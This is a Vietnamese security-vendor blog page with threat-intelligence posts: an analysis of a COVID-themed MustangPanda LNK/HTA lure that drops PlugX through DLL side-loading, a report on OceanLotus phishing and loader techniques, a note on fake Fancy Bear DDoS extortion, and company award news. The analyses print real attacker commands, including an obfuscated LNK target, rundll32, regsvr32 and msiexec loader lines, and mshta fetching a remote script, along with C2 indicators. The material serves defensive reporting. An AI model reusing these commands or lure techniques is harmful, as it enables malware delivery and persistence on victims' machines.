Tác giả: Aishee

MustangPanda – COVID 19 Malware
07 Th3

MustangPanda – COVID 19 Malware

I/ Introduction

Trong thời gian gần đây do diễn biến của dịch COVID 19  khá phức tạp, nhiều nhóm hacker lợi dụng việc này để thực hiện các chiến dịch APT nhằm vào các tổ chức trên thế giới, cũng như xuất hiện chiến dịch ở Việt Nam.

Mới đây lợi dụng tình hình căng thẳng của dịch cúm COVID-19, mẫu mã độc giống với một số mẫu do nhóm tin tặc Panda phát triển được phát hiện đã thực hiện mạo danh văn 3 bản thông báo của chính phủ về tình hình dịch để đánh lừa người dùng. Mã độc được inject trong một file word với tiêu đề: “Chi Thi cua thu tuong nguyen xuan phuc” nhằm đánh lừa người dùng,mãu này hiện được chúng tôi thu thập được thông qua hệ thống CMC Threat Intelligence.

Thông qua hệ thống Threat Intelligence mẫu mã độc này có sự liên quan tới một số mẫu gần đây mà chúng tôi có cảnh báo.

CMC CẢNH BÁO CHIẾN DỊCH APT MỚI LỢI DỤNG UNIKEY TẤN CÔNG NGƯỜI DÙNG VIỆT NAM

CMC CYBER SECURITY PHÂN TÍCH MẪU MALWARE DẠNG LNK CỦA NHÓM APT PANDA

 

II/ Detail

FILE LNK

File mẫu là 1 file shortcut có phần mở rộng là “.lnk” được ẩn dưới dạng một file winword nhằm đánh lừa người dùng do đuôi “.lnk” sẽ được Windows ẩn đi. Tuy nhiên file winword này sử dụng một target đáng ngờ. Thông thường target của shorcut thường trỏ đến một thư mục hoặc file đích, nhưng target của mẫu này lại chứa đoạn command có dạng:

%comspec% /c for %x in (%temp%=%cd%) do for /f “delims==” %i in (‘dir “%x\Chi Thi cua thu tuong nguyen xuan phuc.lnk” /s /b’) do start m%windir:~-1,1%hta.exe “%i”

Đoạn lệnh trên đã được obfuscate bằng cách sử dụng biến %comspec% để thay cho việc gọi trực tiếp chuỗi “cmd.exe” và chữ “s” trong tên file mshta.exe được lấy bằng cách cắt ký tự cuối cùng trong biến “%windir%”(thường là C:\Windows). Mshta.exe là 1 ứng dụng của microsoft phát triển nhằm tận dụng ưu điểm xây dựng nhanh ứng dụng thông qua html, css, vbscript, javascript. Sử dụngmshta và định dạng file .hta, ta có thể mở 1 trang html như 1 ứng dụng.Định dạng file hta cũng giống như file html. Bằng cách thêm thẻ tag vào trong thẻ của file html ta đã có file hta có thể được mở thông qua ứng dụng mshta.

Tuy nhiên, file hta có thể bị chèn thêm vào trước header của nó. Tận dụng điều này, kẻ tấn công đã chèn vào trước nó 1 file lnk với command mở chính nó bằng mshta.exe để thực thi file .hta nhúng kèm. Khi người dùng mở file lnk, sẽ thực thi command trong target của file lnk và thực thi file msha.exe để mở chính nó.

FILE HTA

Mặc định, mshta.exe có thể thực thi cả javascript và vbscript nhúng trong file hta nhờ sử dụng các dll liên quan. File hta nhúng kèm khi mở lên sẽ có các thuộc tính: chạy thu nhỏ(minimize), không hiện trên taskbar, không có menu và caption. Nhiệm vụ duy nhất của nó là thực thi đoạn mã vbscript độc hại.

Khi vbscipt được thực thi, script này giải mã và lưu vào thư mục %TEMP% 3 file binary ở dạng base64 và 1 file document.

File document sau đó được mở cho user.

Khi này cuộc tấn công sử dụng PLUGX RAT sẽ được thực hiện:

File 3.exe thực chất là một file sạch, tuy nhiên khi thực thi nó sẽ load lên 1 file dll độc hại

Để làm điều này, attacker chỉ cần tìm 1 dll được load bằng hàm LoadLibrary trong file 3.exe(ở trường hợp này là http_dll.dll), sau đó tạo ra 1 file dll độc hại với tên trùng với tham số của hàm LoadLibrary và để cùng thư mục với file 3.exe. Khi gọi LoadLibrary, 3.exe sẽ tìm dll trong cùng thư mục trước và load nó lên.

Khi “http_dll.dll” được load lên nó sẽ tiến hành chuyển hướng thực thi của file PE sang 1 hàm trong DLL bằng cách thay đổi thuộc tính vùng nhớ trên memory của file PE thông qua API VirtualProtect và thay thế code bằng cặp lệnh push, ret.

Tại hàm của DLL mã độc sẽ đọc file http_dll.dat trong cùng thư mục. Nội dung ở phần đầu của file dat này là 1 string có null-terminated và phần data. String này sẽ được sử dụng để là key giải mã cho phần data của file dat.

Sau đó, mã độc sẽ tạo ra 1 vùng nhớ mới để chứa phần giải mã được tiến hành bằng thuật toán xor với key là string trong file dat như trên. Mã độc tiếp tục thay đổi thuộc tính của vùng nhớ mới này bằng thuộc tính PAGE_EXECUTE_READWRITE và thực thi shellcode tại địa chỉ này.

Nội dung giải mã thu được là 1 file PE dạng RAW, tuy nhiên đã được lồng vào rất khéo 1 shellcode, bắt đầu từ offset 0. Shellcode này có nhiệm vụ như 1 loader, load file PE dạng raw này để có thể thực thi được.

Đầu tiên, shellcode tìm địa chỉ của kernel32.dll sau đó lấy địa chỉ các hàm LoadLibray, GetProcAddress, ZwFlushIntructionCache, VirtualAlloc bằng cách so sánh hash tên của các hàm được kernel32 export.

Sau đó, Loader đọc header của file PE, thực hiện map các section lên các vùng nhớ tương ứng, realloc lại một số địa chỉ và resolve lại Import Address Table của file. Sau khi hoàn tất, luồng thực thi chương trình sẽ được chuyển qua hàm DllMain của file PE này.

Final Payload

Tại đây, mã độc sẽ tiến hành lấy 1 số đường dẫn để sử dụng, sau đó giải mã 1 phần data section để sử dụng.

Kết quả giải mã là 1 số strings bao gồm tên khóa autorun, ip c&c server. Sau đó mã độc sẽ tiến hành:

  • Tạo bản sao của 3 file thực thi vào thư mục profile của user hoặc alluserprofile nếu có đủ quyền administrator.
  • Thêm và khóa autorun để tự kích hoạt file thực thi vừa drop ra khi khởi động lại máy. Đồng thời tự khởi chạy lại nếu đây là lần chạy đầu tiên của nó. Mã độc phân biệt điều này bằng cách chèn thêm 1 tham số nữa cho nó ở các lần chạy tiếp theo.
  • Tạo mutex, kết nối đến server để nhận lệnh từ server.
  • Tạo backdoor cho phép kẻ tấn công thực thi lệnh từ xa.
  • Hỗ trợ nhiều command khác nhau bao gồm upload file, thư mục, list folder, đọc file, lấy thông tin máy tính, user,…

3. Kết luận

Bằng cách sử dụng nhiều kỹ thuật tấn công khác nhau và làm rối trong khi thực thi cho thấy rằng người đứng sau phát triển mã độc đã đầu tư không ít thời gian để nghiên cứu mục tiêu và phát triển phương pháp tấn công cho phù hợp. APT là một loại tấn công nguy hiểm, được đầu tư kỹ lưỡng nhằm đánh cắp các thông tin quan trọng và gây nhiều thiệt hại cho tổ chức. Để phòng ngừa các cuộc tấn công APT, luôn luôn chuẩn bị các phương án đề phòng và giám sát liên tục mới có thể đảm bảo tính an toàn cho hệ thống của người dùng cũng như cả tổ chức.

HASH

SHA256: BBBEB1A937274825B0434414FA2D9EC629BA846B1E3E33A59C613B54D375E4D2

MD5: 60C89B54029442C5E131F01FF08F84C9

SHA1: 52873A2C81B1F462CDDF3C86B2103F74EF56F91E

C:\Users\admin\AppData\Local\Temp\3.exe:

C3159D4F85CEB84C4A0F7EA9208928E729A30DDDA4FEAD7EC6257C7DD1984763

C:\Users\admin\AppData\Local\Temp\http_dll.dll:

79375C0C05243354F8BA2735BCD086DC8B53AF709D87DA02F9206685095BB035

C2

DOMAIN vietnam.zing.photos

IP 104.160.44.85

By ManhChich – UraSec Team – CMC SOC Center

Tình hình tấn công của nhóm Oceanlotus định danh xuất phát từ Việt Nam tại Trung Quốc
18 Th12

Tình hình tấn công của nhóm Oceanlotus định danh xuất phát từ Việt Nam tại Trung Quốc

Trong nữa đầu năm 2019, theo trung tâm tình báo các mối đe dọa an ninh mạng của Tencent đã đưa ra công bố về các cuộc tấn công của nhóm OceanLotus vào Trung Quốc. Các mục tiêu tấn công của tổ chức này rất đa dạng bao gồm các cơ quan chính phủ, cơ quan hàng hải, cơ quan ngoại giao, doanh nghiệp nhà nước lớn, tổ chức nghiên cứu khoa học và một số các doanh nghiệp tư nhân lớn của Trung Quốc.

Qua theo dõi, Tencent phát hiện số lượng lớn các mục tiêu trong nước đã bị nhóm này tấn công và toàn bộ mạng nội bộ của mục tiêu đã bị chiếm đóng, có thể xác định một lượng lớn thông tin bí mật và các thông tin cấu hình máy chủ bị đánh cắp. Những kẻ tấn công có vẻ rất quan thuộc với Trung Quốc cũng như hiểu rõ các vấn đề nóng hỏi và cơ cấu chính phủ của Trung Quốc. Ví dụ, khi một cải cách thuế vừa được đưa ra, một kế hoạch cải cách thuế đã ngay lập tức được sử dụng làm chủ đề của một cuộc tấn công.

Sea Lotus (OceanLotus) hay còn được gọi là APT32, là một tổ chức tấn công mạng được nhiều tổ chức định danh là xuất phát từ Việt Nam. Kể từ khi hoạt động, nhóm đã thực hiện nhiều cuộc tấn công vào Trung Quốc, cũng như nhiều nước khác trên thế giới.

Các phương thức tấn công không có nhiều thay đổi so với lần đầu phát hiện, nhưng có một số cải tiến nhỏ bao gồm các loại attack decoys, payload, phương thức bypass các lớp bảo mật..etc Phương thức tấn công phishing bằng email vẫn được sử dụng. Sau khi có được quyền kiểm soát máy, kẻ tấn công sẽ dò quét toàn bộ hệ thống mạng. Điều này cũng cho thấy các cuộc tấn công APT sẽ không ngừng cho đến khi nó đạt được mục đích. Miễn là mục tiêu có giá trị, cuộc tấn công sẽ ngày càng mạnh mẽ hơn.

Đăc điểm của cuộc tấn công

Tấn công bằng email lừa đảo

Sea Lotus thông qua việc gửi Email giả danh về các tổ chức uy tín, người dùng dễ bị đánh lừa tự tải về các File độc hại. Trong suốt năm 2019, đã có rất nhiều email lừa đảo được gửi, chẳng hạn như email sau:

Các tài khoản được sử dụng để gửi email lừa đảo thường là hộp thư của NetEase. Các kiểu tài khoản tấn công thường như là: Sun**@126[.]com, Yang**@163[.] com, chen**@126[.] com…

Đa dạng hóa các loại mồi nhử lừa đảo
Nhóm thường sử dụng đa dạng hóa các loại mồi nhử cho cuộc tấn công và hầu như tất cả các loại mồi đã được sử dụng. Ngoài các tệp độc hại Ink, tệp doc, tệp nén của WinRAR ACE (CVE-2018-20250) được đề cập trong nhiều bản báo cáo.

Tệp độc hại dưới dạng doc:

Tệp Chm giải mã

Lỗ hổng Winrar (CVE-2018-20250)

Đa dạng cách thức tải tệp
Do sự đa dạng của các loại mồi nhử cho việc lừa đảo, cách thức tải các tệp độc hại cũng khác nhau.

 Thực thi trực tiếp

Tệp thực thi được nguy trang dưới dạng một File DOCX, có icon của microsoft word, được sử dụng để đánh lừa người dùng tải về. Sau khi người dùng có hành vi tải tệp DOC và tiến hành mở. Sau khi File mở ra, các thông tin trong file tài liệu bị xáo trộn, lôi kéo nạn nhân kích hoạt macro code trong file tài liệu để có thể xem nội dung bên trong tài liệu. Trong thực tế, sau khi macro được bật, nội dung bình thường vẫn không hiển thị

Sử dụng Rundll32 để tải dll độc hại
Sau khi thực thi các đoạn mã độc hại, nó sẽ gọi và thực thi đoạn mã độc hại thực sự {1888B763-A56C-4D4B-895C-2092993ECCBA} trong thư mục C:\User\Administrator\AppData\Local\Microsoft, sau đó sử dụng Rundll32 để thực thi dll:

“C:\Windows\system32\rundll32.exe” “C:\Users\ADMINI~1\AppData\Local\Microsoft\{1888B763-A56C-4D4B-895C-2092993ECCBA}.dll”,Register
Macro
Sử dụng một Macro để thực thi và mã Macro bị obfuscated:

Office memory thực thi shellcode độc hại
Bằng mã Macro, giải mã trực tiếp shellcode trong Office và tạo ra một luồng để thực thi trong bộ nhớ:

Sử dụng dll
Sử dụng kỹ thuật DLL(DLL Side-Loading) để thực thi, tải các File độc hại:


 Thực thi

Đăng kí một DLL độc hại như một thành phần của hệ thống để thực thi:

Tệp lệnh nhúng
Tệp Chm sẽ thực thi, nó nhắc thực thi mã ActiveX:

Nội dung kịch bản của tệp:

Tuy nhiên, do vấn đề xử lý mã hóa, chm bị cắt bớt sau khi mở:

 

Sau khi giản nén, nội dung ban đầu như sau:

Các cuộc tấn công liên tục sử dụng scheduled tasks
Sau khi chm được thực thi, tệp bcdsrv.dll sẽ được phát hành theo %AppData%\Roaming và sau đó một tác vụ theo lịch trình có tên là WeeklyMaintenance sẽ được tạo:

Lệnh thực thi:

C:\Windows\System32\msiexec.exe -Y

C:\Users\Administrator\AppData\Roaming\bcdsrv.dll

Bcdsrv.dll là một tệp tin độc hại thực sự.

Ink gọi mstah để thực hiện

Phân tích chi tiết về kỹ thuật Ink gọi mstah

Sau khi thực hiện, lệnh được gọi:

C:\Windows\SysWOW64\mshta.exe http://api.baidu-json.com/feed/news.html

Và new.html thực sự là một tập tin Vbs là một tập tin chứa mã có thể thực thi.

Sử dụng odbcconf.exe để tải tệp
Odbcconf.exe là một tệp đi kèm với hệ thống. Tệp này có thể được sử dụng để thực thi tệp dll và vì quá trình máy chủ là tệp hệ thống, nên nó có thể thoát khỏi sự can thiệp của một số phần mềm bảo mật:

Lỗ hổng WinRAR ACE (CVE-2018-20250)
Gói nén với lỗ hổng này có thể được cấu trúc như sau: Ngoài việc giải nén các tệp bình thường sau khi giải nén, thư mục khởi động (C: \ Users \ Administrator \ AppData \ Roaming \ Microsoft \ Windows \ Start Menu \ Programs \ Startup) phát hành tệp tự giải nén:

Tệp này là chương trình tự giải nén. Khi khởi động, nó sẽ phát hành tệp {7026ce06-ee00-4ebd-b00e-f5150d86c13e} .ocx, sau đó thực hiện lệnh:

regsvr32 /s /i {7026ce06-ee00-4ebd-b00e-f5150d86c13e}.ocx

Multi-load attack
Trong cuộc tấn công mới nhất, Sea Lotus đã sử dụng một Multi-load attack. Trong các cuộc tấn công trước đó, sau khi giải mã shellcode, RAT cuối cùng đã được thực thi trực tiếp, chẳng hạn như:

chúng tôi thấy rằng sau khi giải mã shellcode, shellcode được tải xuống và thực thi trước. Nếu quá trình tải xuống không thành công, thì RAT được cài đặt trước được tải:

Điều này làm cho các hoạt động tấn công trở nên phong phú và đa dạng hơn và cũng có thể kiểm soát được.

Cuộc lẩn tránh các phần mềm bảo mật
Sea Lotus cũng sử dụng nhiều phương pháp khác nhau để chống lại phần mềm bảo mật, chủ yếu là:

Sử dụng DLL để thực thi
Sử dụng tệp hệ thống thực thi
Có thể nhắc đến như odbcconf.exe.

Thực thi shellcode trực tiếp trong office
Thêm dữ liệu rác vào các tập tin để mở rộng kich thước.
Để ngăn chặn tập tin được thu thập bởi các nhà cung cấp bảo mật, tổ chức Sea Lotus đã cố tình thêm một lượng lớn dữ liệu rác vào tài nguyên của một số tệp nhất định để mở rộng kích thước tệp.

Nếu một tệp chứa đầy dữ liệu rác, kích thước tệp lên tới 61,4 MB (64,480,256 byte):

Tạo backdoor
Tệp backdoor được mã hóa và tùy chỉnh theo thuộc tính của máy. Do vậy, tệp băm trên mỗi máy là khác nhau và không thể thực hiện được nếu không có thông tin liên quan đến máy chứa backdoor. Ngay cả khi mã độc bị các nhà cung cấp bảo mật tìm thấy, miễn là không có dữ liệu liên quan đến máy tính chưa mã độc thì tải trọng không thể được giải mã.

Nguy trang cho kết nối CnC
Theo thông tin cấu hình, các kết nối và ngụy trang khác nhau có thể được thực hiện, và C2 được lắp ráp và phân tích. Các CnC thường có cấu trúc (xxx là cấu hình C2):

{rand} .xxx

www6.xxx

cdn.xxx api.xxx

Giả mạo các HTTP Header:

Backdoor tùy chỉnh
Một kỹ thuật ấn tượng nhất của Sea Lotus đã sử dụng vào năm 2019 ( chủ yếu là sử dụng backdoor trong giai đoạn thứ 2) . Kỹ thuật này đã được công bố gần đây với các tệp độc hại do mỗi máy victim phát hành được mã hóa bằng các thuộc tính máy có liên quan (như tên máy) của máy victim và được thực thi. Chúng ta cần một phần thông tin này, nếu không không thể giải mã nó.

Do đó, mỗi tệp độc hại được phát hành là khác nhau và ngay cả khi bị nhà cung cấp bảo mật tìm thấy, miễn là không có dữ liệu liên quan của máy victim, tải trọng thực không thể được giải mã.

Backdoor cũng được thực thi liên quan đến các file và tiến trình bao gồm: AdobeUpdate.exe + goopdate.dll, KuGouUpdate.exe + goopdate.dll, XGFileCheck.exe + goopdate.dll, SogouCloud.exe + inetmib1.dll và các kết hợp khác để thực thi.

Quá trình mã hóa là:

Qua ví dụ dưới có thể thấy, tên người dùng đã được sử dụng để mã hóa.

Tên người dùng victim là Cao **. Có thể thấy rằng Trojan được tạo ra đặc biệt để lây nhiễm vào máy tính này.

Phần mềm độc hại
Qua quá trình theo dõi, nhận thấy có Sea Lotus thường sử dụng ba loại phần mềm độc hại chính: CobaltStrike’s beacon Trojan, họ Trojan Denis và Ghost đã sửa đổi. Trong đó CobaltStrike’s beacon Trojan và họ Trojan Denis thường được phát hiện nhiều nhất, Ghost rất it khi được sử dụng.

CobaltStrike:

Denis:

Ghost được sửa đổi:

Thâm nhập mạng
Sau khi một máy chủ đã bị nhiễm mã độc thông qua tấn công Email Phishing, Sea Lotus sẽ tiếp tục các cuộc tấn công vào các máy nội bộ. Chúng tiến hành rà quét, tìm kiếm, tấn công sang các máy nội bộ bằng nhiều cách nhất có thể.

Get the hash:

Package file:

Ngoài ra cũng sẽ có các tác vụ được tạo ra theo lịch trình để tải xuống các công cụ liên tục thông qua Powershell:

Tệp độc hại được phát hiện là goopdate.dll.

Một số hoạt động khác

Trong quá trình theo dõi, một số cuộc tấn công tương tự được tìm thấy như các cuộc tấn công của Sea Lotus như:

Các mã độc cuối cùng cũng được thực thi bởi hai loại tệp:

Beacon payload được tạo bởi CobaltStrike.
Còn lại là Payload block numverse_http được sử dụng bởi metasploit.
Ngoài ra, CnC của các cuộc tấn công này thường được phát hiện ở Trung Quốc:

Mặc dù gần đây đang có những cuộc tấn công giống với các hành vi của Sea Lotus nhưng cũng có những hành vi không giống do đó chưa thể kết luận về các cuộc tấn công đó liên quan đến SeaLotus.

Tóm tắt về Sea Lotus
Sea Lotus là một trong những nhóm APT tích cực nhất trong những năm gần đây, thường xuyên tấn công vào các khu vực ở Trung Quốc và các nước trên thế giới. Nhiều công ty an ninh mạng đã liên tục đưa ra các báo cáo về các cuộc tấn công của Sea Lotus gần đây. Nhóm Sea Lotus này hiện tại vẫn chưa có dấu hiệu dừng lại, chúng liên tục cập nhật các công nghệ, kỹ thuật tấn công gây rất nhiều khó khăn cho các công tác bảo đảm ATTT. Vì vậy, người dùng cần nâng cao nhận thức bảo mật , không tự ý thực hiện các tệp đính kèm của các email không xác định và không bị đánh lừa bởi các tin nhắn lừa đảo.

Khuyến nghị an toàn

  • Nâng cao nhận thức về bảo mật, không mở tệp đính kèm của các email không xác định, trừ khi nguồn tài liệu đáng tin cậy và mục đích rõ ràng, không dễ dàng kích hoạt macro của Office.
  • Cài đặt các bản vá và bản vá hệ điều hành cho các phần mềm quan trọng như Office một cách kịp thời.
  • Sử dụng phần mềm Antivirus để ngăn chặn các cuộc tấn công như ngựa thành Troy có thể xảy ra.
  • Người dùng, doanh nghiệp nên triển khai hệ thống phát hiện mối đe dọa sớm như SOC. Hệ thống SOC hiện nay đang là sự lựa chọn hàng đầu của các nhà bảo mật.
    Các IOC liên quan 

MITRE ATT&CK

Nguồn: mp.weixin.qq.com

RDoS ATTACKS BY FAKE FANCY BEAR
05 Th12

RDoS ATTACKS BY FAKE FANCY BEAR

Vừa qua, trên Threat Intelligence có thu lượm được một vài thông tin về các chiến dịch tấn công từ chối dịch vụ RDoS (ransom denial-of-service), kẻ tấn công yêu cầu đòi tiền chuộc đối với các nạn nhân để không bị tấn công.

Những kẻ tấn công đó đã tống tiền dọa nạt thông qua việc gửi các email đe dọa các nạn nhân. Hầu hết kẻ tấn công lấy danh nghĩa của nhóm  Fancy Bear để lấy danh tiếng nhóm này đe dọa khiến những nạn nhân cảm thấy sợ hại. Những kẻ tấn công đóng giả là Fancy Bear khét tiếng đe dọa sẽ khởi động cuộc tấn công DDoS nếu tiền chuộc không được trả. Trong một số trường hợp, những kẻ tấn công đã thực hiện các cuộc tấn công DDoS nhỏ để chứng minh khả năng của chúng và xác nhận mối đe dọa. Các cuộc tấn công cũng được xác nhận bởi các nhà nghiên cứu bảo mật khác.

Cũng đợt đó CMC Cyber Security nhận được yêu cầu support từ một tổ chức khi họ nhận được email đe dọa giống như vậy

 

Một số tổ chức khi nhận được email đe dọa này cũng đã bị một cuộc tấn công DDoS demo vào các server của họ.

Vector attack (floods) sử dụng các giao thức UDPICMP , đặc biệt kẻ tấn công đã sử dụng UDP/3283, đây là một attack vector mới được phát hiện vào 06/2019.

Port UDP/3283 được sử dụng bởi giao thức Apple Remote Desktop Application (ARD) và service ARMS.

Fancy Bear hay còn gọi là APT28 (Sednit group, Sofacy, Pawn Storm, Strontium, Tsar Team, TG-4127, Group-4127, TAG_0700, Swallowtail, Iron Twilight, Group 74) hoạt động từ 2004,  Fancy Bear là một tổ chức hacker chuyên tấn công các tổ chức lớn, chính phủ các nước bằng các chiến dịch APT.

Có thể khẳng định là nhóm Fancy Bear không liên quan gì đến các chiến dịch RDoS (ransom denial-of-service), mục tiêu của họ đa phần là phá hoạt và làm gián điệp, trong khi mục tiêu của những kẻ trên là tiền một thứ mà nhóm Fancy Bear được tài trợ, chỉ là một chút đe dọa sử dụng social engineering.

Các source ip được sử dụng dụng bởi kẻ tấn công sử dụng random cho UDP Flood trong cuộc tấn công RDoS

CMC Cyber Security sẽ chỉ public 1 phần, nếu bạn muốn cần nhiều hơn hãy contact chi tiết.

Phương thức để giảm thiểu ngăn chặn những cuộc tấn công DDOS kiểu này có nhiều và cũng không quá khó để thực hiện. Chúng tôi sẽ tiếp tục apdate các thông tin chi tiết cụ thể trong thời gian sớm nhất.

VNISA trao giải Sản phẩm an toàn thông tin mới xuất sắc 2018 cho CMC Infosec
10 Th9

VNISA trao giải Sản phẩm an toàn thông tin mới xuất sắc 2018 cho CMC Infosec

VNISA vừa trao danh hiệu bình chọn sản phẩm dịch vụ an toàn thông tin năm 2018 cho CMC Infosec với 3 giải gồm: Sản phẩm ATTT chất lượng cao, Dịch vụ ATTT tiêu biểu và Sản phẩm an toàn thông tin mới xuất sắc 2018.

VNISA trao danh hiệu bình chọn sản phẩm dịch vụ an toàn thông tin năm 2018 cho các doanh nghiệp.

Được tổ chức dưới sự bảo trợ của Bộ T&TT, chương trình bình chọn “Sản phẩm an toàn thông tin (ATTT) chất lượng cao” và “Dịch vụ ATTT tiêu biểu” là hoạt động thường niên được Hiệp hội ATTT Việt Nam (VNISA) triển khai từ năm 2015 nhằm đánh giá, công nhận và tôn vinh các sản phẩm, dịch vụ ATTT có chất lượng tốt. Sự kiện được tổ chức tại Hội thảo quốc tế Ngày An toàn thông tin Việt Nam 2018. Điểm mới của chương trình năm nay là Hội đồng bình chọn thống nhất sẽ đánh giá và đề nghị chứng nhận thêm danh hiệu “Sản phẩm ATTT mới xuất sắc” nhằm khuyến khích các sản phẩm ATTT mới, có tính sáng tạo cao.

Tại lễ công bố và trao danh hiệu bình chọn sáng 30/11/2018, ông Vũ Lâm Bằng, Giám đốc Trung tâm Nghiên cứu & Phát triển sản phẩm CMC Infosec đã đại diện công ty CMC Infosec nhận cả 3 giải thưởng: “Sản phẩm ATTT chất lượng cao”, “Dịch vụ ATTT tiêu biểu” và “Sản phẩm ATTT Mới xuất sắc” 2018.

Danh hiệu “Sản phẩm ATTT chất lượng cao 2018” và “Dịch vụ ATTT tiêu biểu 2018” được đánh giá, bình chọn theo các tiêu chí chính gồm nhu cầu và hiệu quả ứng dụng, công nghệ và chất lượng sản phẩm, thị trường và dịch vụ hỗ trợ, tỉ lệ chiếm lĩnh thị trường. Hai giải pháp phòng chống mã độc cho doanh nghiệp CMC Internet Security Enterprise (CISE) và dịch vụ đánh giá kiểm thử xâm nhập của CMC Infosec đã lần lượt được nhận 2 danh hiệu này. Trong đó, giải pháp CISE được tích hợp trí tuệ nhân tạo AI (Artificial Intelligence) để phát hiện bất thường, phân tích và nhân dạng hành vi của mã độc, là một giải pháp đang được CMC Infosec ưu tiên nghiên cứu phát triển.

Đáng chú ý, điểm mới của chương trình bình chọn năm nay có thêm danh hiệu “Sản phẩm ATTT Mới xuất sắc” nhằm khuyến khích các sản phẩm sản phẩm ATTT mới, có tính sáng tạo cao. Ngay trong năm đầu tiên có giải, Trung tâm Điều hành An ninh an toàn thông tin thế hệ mới CMC NextGen SOC đã được nhận danh hiệu này. SOC (Security Operation Center) là một trung tâm trong nội bộ 1 hệ thống có nhiệm vụ theo dõi, phát hiện, cách ly, xử cố các sự cố và chịu trách nhiệm về an ninh an toàn của các thiết bị mạng, thiết bị bảo mật, servers hay các máy trạm. CMC NextGen SOC lại là sự kết hợp hoàn hảo giữa 3 yếu tố: Công nghệ – Quy trình – Con người nhằm theo dõi, phát hiện, tự động phản ứng trước mọi sự cố an toàn thông tin, với công nghệ vượt trội kết hợp AI – Machine Learning (Học máy) và Automation (Tự động hóa), cho phép phát hiện sớm các dấu hiệu bất thường. Toàn bộ công nghệ và quy trình của CMC SOC đều được phát triển và vận hành bởi những kỹ sư người Việt của CMC Infosec.

Năm nay, các thành viên Hội đồng bình chọn đều là những nhà quản lý, chuyên gia uy tín đến từ một số cơ quan, tổ chức và doanh nghiệp lớn hoạt động trong lĩnh vực ATTT như: Bộ Tư lệnh tác chiến mạng của Bộ Quốc phòng, Cục Quản lý mật mã dân sự và Kiểm định sản phẩm mật mã của Ban Cơ yếu Chính phủ, Trung tâm Ứng cứu khẩn cấp máy tính Việt Nam (VNCERT) của Bộ TT&TT… Ông Vũ Quốc Thành, Phó Chủ tịch VNISA nhấn mạnh: “Chương trình bình chọn năm nay của Hiệp hội An toàn thông tin Việt Nam lựa chọn những sản phẩm, dịch vụ hoàn chỉnh có tính năng chất lượng cao về an toàn, bảo mật thông tin, xuất xứ từ Việt Nam, do doanh nghiệp, tổ chức Việt Nam sở hữu và làm chủ công nghệ. Năm nay chúng tôi có thêm hạng mục giải Sản phẩm ATTT Mới xuất sắc do lĩnh vực này ở Việt Nam còn khá mới, các sản phẩm có thể đang ở trong giai đoạn chưa có mặt trên thị trường nhưng cũng cần được khuyến khích phát triển, đầu tư thích đáng. Tại hạng mục này, giải pháp CMC SOC của CMC Infosec đã được Hội đồng bình chọn đánh giá là tốt và có chất lượng, nên được đẩy mạnh tại thị trường Việt Nam.”

Ông Vũ Lâm Bằng, Giám đốc Trung tâm Nghiên cứu & Phát triển sản phẩm CMC Infosec chia sẻ tại sự kiện: “Năm nay, Ban tổ chức có thêm 1 giải mới dành cho các sản phẩm khác biệt và tiên phong, CMC là công ty đầu tiên ở Việt Nam tự xây dựng Trung tâm Điều hành An ninh an toàn thông tin từ đầu đến cuối chứ không mua sắm công nghệ của bên nào. Hiện tại CMC SOC của CMC Infosec cũng được các đơn vị nước ngoài đánh giá rất cao”.

CMC Infosec được thành lập năm 2008 với sứ mệnh phát triển các sản phẩm, dịch vụ an toàn thông tin cho khách hàng cá nhân và doanh nghiệp, các giải pháp phòng chống mã độc, các dịch vụ an toàn thông tin. Với số lượng nhân viên 70 người, quy tụ hơn 45 kỹ sư hàng đầu về bảo mật và CNTT, đội ngũ kỹ sư và chuyên gia đạt bằng cấp, chứng chỉ quốc tế về bảo mật như PCI QSA, ISO 27001 Lead Auditor, CEH… và có kinh nghiệm tham gia xử lý rất nhiều sự cố an ninh an toàn thông tin lớn ở Việt Nam, 100% các sản phẩm và giải pháp cung cấp ra thị trường của CMC Infosec đều do người Việt Nam tự nghiên cứu và phát triển, linh hoạt và phù hợp với nhu cầu của nhiều đối tượng khách hàng từ Khối chính phủ, tài chính, doanh nghiệp đến người dùng cá nhân. CMC Infosec hiện là thành viên Việt Nam duy nhất của Hiệp hội các nhà nghiên cứu mã độc Châu Á (AVAR) và Liên minh Bảo mật máy tính quốc tế (ICSA), tất cả các sản phẩm và dịch vụ của CMC Infosec cung cấp đều được kiếm định nghiêm ngặt với tiêu chuẩn quốc tế và nhận được sự hỗ trợ của các chuyên gia bảo mật đến từ các tổ chức danh tiếng trên.

Sau Viettel và Bkav, Bộ TT&TT công nhận giải pháp chống mã độc của CMC, Veramine đáp ứng yêu cầu kỹ thuật
10 Th9

Sau Viettel và Bkav, Bộ TT&TT công nhận giải pháp chống mã độc của CMC, Veramine đáp ứng yêu cầu kỹ thuật

Danh mục sản phẩm phòng, chống phần mềm độc hại đáp ứng yêu cầu kỹ thuật theo Chỉ thị 14 của Thủ tướng Chính phủ vừa được bổ sung thêm 2 giải pháp của CMC và Veramine. Trước đó, đã có 2 giải pháp của Bkav, Viettel được Bộ TT&TT đánh giá và công nhận.

Giải pháp phòng chống mã độc tập trung CMC Malware Detection and Defence là 1 trong 2 sản phẩm mới được bổ sung vào Danh mục sản phẩm phòng, chống phần mềm độc hại đáp ứng yêu cầu kỹ thuật theo Chỉ thị 14 (Ảnh minh họa: cmc.com.vn)

Bộ TT&TT vừa cập nhật Danh mục sản phẩm phòng, chống phần mềm độc hại đáp ứng yêu cầu kỹ thuật theo Chỉ thị 14 ngày 25/5/2018 của Thủ tướng Chính phủ về nâng cao năng lực phòng, chống phần mềm độc hại (gọi tắt là mã độc).

Theo đó, có 2 sản phẩm phòng, chống mã độc của 2 doanh nghiệp vừa được Bộ TT&TT đánh giá và bổ sung vào Danh mục nêu trên, bao gồm: giải pháp phòng chống mã độc tập trung CMC Malware Detection and Defence (CMDD) của Công ty TNHH An ninh An toàn thông tin CMC (CMC Cyber Security) và bộ giải pháp Veramine Advanced Endpoint Security Suite (VAESS), bộ giải pháp phát hiện, ứng phó và phòng thủ chủ động với các mối đe dọa trên các điểm cuối trong hệ thống mạng (bao gồm các máy chủ, máy trạm) của Công ty Veramine.

